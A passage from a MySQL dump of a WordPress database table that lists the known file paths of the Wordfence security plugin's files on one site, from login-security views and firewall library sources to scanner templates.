(552, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),
(553, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(554, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),
(555, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),
(556, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),
(557, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),
(558, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),
(559, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),
(560, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),
(561, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php'),
(562, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/manage.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),
(563, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/page.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),
(564, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php'),
(565, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/role.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/role.php'),
(566, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),
(567, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/settings.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),
(568, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php', 'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),
(569, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/settings/options.php', 'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),
(570, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php', 'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),
(571, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php', 'wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php'),
(572, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php', 'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),
(573, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/readme.txt', 'wp-content/plugins/wordfence/readme.txt'),
(574, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/tmp/.htaccess', 'wp-content/plugins/wordfence/tmp/.htaccess'),
(575, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/.htaccess', 'wp-content/plugins/wordfence/vendor/.htaccess'),
(576, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/autoload.php', 'wp-content/plugins/wordfence/vendor/autoload.php'),
(577, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/ClassLoader.php', 'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),
(578, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php', 'wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php'),
(579, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/LICENSE', 'wp-content/plugins/wordfence/vendor/composer/LICENSE'),
(580, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php', 'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),
(581, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php', 'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),
(582, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php', 'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),
(583, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_real.php', 'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),
(584, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/autoload_static.php', 'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),
(585, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/installed.json', 'wp-content/plugins/wordfence/vendor/composer/installed.json'),
(586, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/composer/installed.php', 'wp-content/plugins/wordfence/vendor/composer/installed.php'),
(587, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php'),
(588, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php'),
(589, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php'),
(590, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php'),
(591, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php'),
(592, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php'),
(593, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php'),
(594, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php'),
(595, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php'),
(596, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php'),
(597, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php'),
(598, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php'),
(599, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php'),
(600, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php'),
(601, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php'),
(602, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php'),
(603, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php'),
(604, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php'),
(605, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php'),
(606, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php'),
(607, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php'),
(608, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php', 'wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php'),
(609, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),
(610, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),
(611, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),
(612, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php'),
(613, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),
(614, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),
(615, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),
(616, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),
(617, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),
(618, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),
(619, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),
(620, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),
(621, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),
(622, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php'),
(623, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),
(624, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),
(625, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),
(626, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),
(627, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),
(628, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),
(629, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),
(630, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),
(631, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),
(632, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),
(633, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),
(634, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),
(635, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),
(636, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/.htaccess', 'wp-content/plugins/wordfence/views/.htaccess'),
(637, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/block-list.php', 'wp-content/plugins/wordfence/views/blocking/block-list.php'),
(638, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/blocking-create.php', 'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),
(639, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/blocking-status.php', 'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),
(640, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/country-block-map.php', 'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),
(641, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/country-modal.php', 'wp-content/plugins/wordfence/views/blocking/country-modal.php'),
(642, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php', 'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),
(643, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php', 'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),
(644, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php', 'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),
(645, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/block-navigation-option.php', 'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),
(646, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/indeterminate-progress.php', 'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),
(647, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/license.php', 'wp-content/plugins/wordfence/views/common/license.php'),
(648, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/modal-prompt.php', 'wp-content/plugins/wordfence/views/common/modal-prompt.php'),
(649, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php', 'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),
(650, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-help.php', 'wp-content/plugins/wordfence/views/common/page-help.php'),
(651, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-tabbar.php', 'wp-content/plugins/wordfence/views/common/page-tabbar.php'),
(652, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-title.php', 'wp-content/plugins/wordfence/views/common/page-title.php'),
(653, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/section-subtitle.php', 'wp-content/plugins/wordfence/views/common/section-subtitle.php'),
(654, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/section-title.php', 'wp-content/plugins/wordfence/views/common/section-title.php'),
(655, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-circular.php', 'wp-content/plugins/wordfence/views/common/status-circular.php'),
(656, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-critical.php', 'wp-content/plugins/wordfence/views/common/status-critical.php'),
(657, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-detail.php', 'wp-content/plugins/wordfence/views/common/status-detail.php'),
(658, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-tooltip.php', 'wp-content/plugins/wordfence/views/common/status-tooltip.php'),
(659, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-warning.php', 'wp-content/plugins/wordfence/views/common/status-warning.php'),
(660, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/unsubscribe.php', 'wp-content/plugins/wordfence/views/common/unsubscribe.php'),
(661, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/global-status.php', 'wp-content/plugins/wordfence/views/dashboard/global-status.php'),
(662, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/option-howgetips.php', 'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),
(663, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-alert.php', 'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),
(664, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php', 'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),
(665, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php', 'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),
(666, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-general.php', 'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),
(667, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-import.php', 'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),
(668, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-license.php', 'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),
(669, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php', 'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),
(670, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php', 'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),
(671, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/status-renewing.php', 'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),
(672, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/diagnostics/text.php', 'wp-content/plugins/wordfence/views/diagnostics/text.php'),
(673, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/gdpr/banner.php', 'wp-content/plugins/wordfence/views/gdpr/banner.php'),
(674, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php', 'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),
(675, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php', 'wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php'),
(676, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/banner.php', 'wp-content/plugins/wordfence/views/onboarding/banner.php'),
(677, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php', 'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),
(678, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/fresh-install.php', 'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),
(679, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php', 'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),
(680, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/overlay.php', 'wp-content/plugins/wordfence/views/onboarding/overlay.php'),
(681, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/plugin-header.php', 'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),
(682, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/registration-prompt.php', 'wp-content/plugins/wordfence/views/onboarding/registration-prompt.php'),
(683, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/tour-overlay.php', 'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),
(684, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/block-all-options-controls.php', 'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),
(685, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/block-controls.php', 'wp-content/plugins/wordfence/views/options/block-controls.php'),
(686, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-label.php', 'wp-content/plugins/wordfence/views/options/option-label.php'),
(687, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-select.php', 'wp-content/plugins/wordfence/views/options/option-select.php'),
(688, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-switch.php', 'wp-content/plugins/wordfence/views/options/option-switch.php'),
(689, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-text.php', 'wp-content/plugins/wordfence/views/options/option-text.php'),
(690, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-textarea.php', 'wp-content/plugins/wordfence/views/options/option-textarea.php'),
(691, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php', 'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),
(692, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-multiple.php', 'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),
(693, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-segmented.php', 'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),
(694, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-select.php', 'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),
(695, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-sub.php', 'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),
(696, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-textarea.php', 'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),
(697, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled.php', 'wp-content/plugins/wordfence/views/options/option-toggled.php'),
(698, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-token.php', 'wp-content/plugins/wordfence/views/options/option-token.php'),
(699, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/options-title.php', 'wp-content/plugins/wordfence/views/options/options-title.php'),
(700, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php', 'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),
(701, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/reports/activity-report.php', 'wp-content/plugins/wordfence/views/reports/activity-report.php'),
(702, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-base.php', 'wp-content/plugins/wordfence/views/scanner/issue-base.php'),
(703, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php', 'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),
(704, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php', 'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),
(705, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php', 'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),
(706, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php', 'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),
(707, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-configReadable.php', 'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),
(708, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php', 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),
(709, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php', 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),
(710, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php', 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),
(711, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php', 'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),
